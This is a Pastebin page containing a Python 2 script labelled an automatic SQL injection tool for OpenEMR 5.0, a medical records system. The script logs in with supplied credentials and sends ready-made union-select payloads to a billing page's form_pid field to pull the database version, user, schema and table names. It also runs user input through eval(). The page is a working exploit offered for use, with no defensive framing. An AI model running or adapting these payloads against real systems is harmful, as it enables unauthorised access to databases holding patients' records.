Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #Project OpenEMR 5.0
- #autmatic sql injection
- from bs4 import BeautifulSoup
- import re
- import getpass
- import mechanize
- intro = """
- '||''''| '|| ||' '||''|.
- ... ... ... .... .. ... || . ||| ||| || ||
- .| '|. ||' || .|...|| || || ||''| |'|..'|| ||''|'
- || || || | || || || || | '|' || || |.
- '|..|' ||...' '|...' .||. ||. .||.....| .|. | .||. .||. '|'
- || version 5.0.0
- '''' SQL Injection Tool
- """
- print intro+"\n"
- host = raw_input("\nEnter Host: ")
- url = ("http://"+host+"/openemr/interface/login/login.php?site=default")
- vulnurl = ("http://"+host+"/openemr/interface/billing/sl_eob_search.php/sl_eob_search.php")
- br = mechanize.Browser()
- br.set_handle_robots(False)
- br.set_handle_redirect(True)
- r = br.open(url)
- br.select_form(nr = 0)
- print "Login\n-----"
- name = raw_input("Username: ")
- passw = getpass.getpass("Password: ")
- br.form["authUser"] = name
- br.form["clearPass"] = passw
- logged_in = br.submit()
- version = "' union select 1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17#"
- user = "' union select 1,2,3,4,5,6,7,8,user(),10,11,12,13,14,15,16,17#"
- database ="' union select 1,2,3,4,5,6,7,8,schema(),10,11,12,13,14,15,16,17#"
- tables = "' union select 1,2,3,4,5,6,7,8,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(0)FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,table_name,0x2c))))x),10,11,12,13,14,15,16,17#"
- while 1:
- x = br.open(vulnurl)
- br.select_form(nr = 0)
- print "version = print Mysql Version\nuser = print user of Website\ndatabase = print main database \ntables = Print all tables of Main database"
- input1 = eval(raw_input("\nWhats your choice? "))
- br.form["form_pid"] = "".join(input1)
- query = br.submit()
- end = query.read()
- soup = BeautifulSoup(end,"html.parser")
- href = soup.find_all(onclick="return npopup(2)")
- print href
- print "\n\n"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement